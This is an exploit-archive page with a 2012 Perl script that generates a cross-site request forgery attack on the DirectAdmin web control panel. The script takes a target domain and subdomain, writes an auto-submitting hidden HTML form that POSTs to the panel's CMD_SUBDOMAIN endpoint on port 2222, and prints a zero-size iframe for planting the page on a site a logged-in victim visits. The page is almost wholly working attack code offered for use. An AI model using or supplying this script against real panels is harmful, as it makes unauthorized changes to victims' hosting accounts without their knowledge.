Home / exploits DirectAdmin Cross Site Request Forgery
Posted on 24 January 2012
#!/usr/bin/perl ######################################################################## # Title : DirectAdmin Web Control Panel � 2005 JBMC Software # Author : Onur T�RKE�HAN # Homepage : http://www.directadmin.com/ # tested on : Windows 7 # Seni Unutmayacagiz MIRIM- system("cls"); print " +----------------------------------------+ | directadmin csrf vuln creator by turkeshan | | cyber-warrior.org lojistik grup | +----------------------------------------+ Loading ... "; sleep(3); print "Site aDi "; $h = <STDIN>; chomp $h; print "Sub Domain Adi "; $sub = <STDIN>; chomp $usub; $html = '<form name=info action="http://'.$h.':2222/CMD_SUBDOMAIN?domain='.$h.'" method="POST"> <input type=hidden name=action value="create"> <input type=hidden name=domain value="'.$h.'"> <input type=text name=subdomain size=8 value="'.$sub.'"> <script>document.info.submit();</script> </form>'; sleep(2); print "olusturuluyor ... "; open(XSS , '>>csrf.htm'); print XSS $html; close(XSS); print "olusturuldu .. "; sleep(2); print "dosyayi sitenize upload edin ve dosya ismini yazin"; $csrf = <STDIN>; chomp $csrf; $done = '<iframe id="iframe" src="'.$csrf.'" width="0" height="0"></iframe>'; sleep(2); print "exploit basariyla tamamlandi "; print $done." "; print ""; print " hayrini gorun .. ";
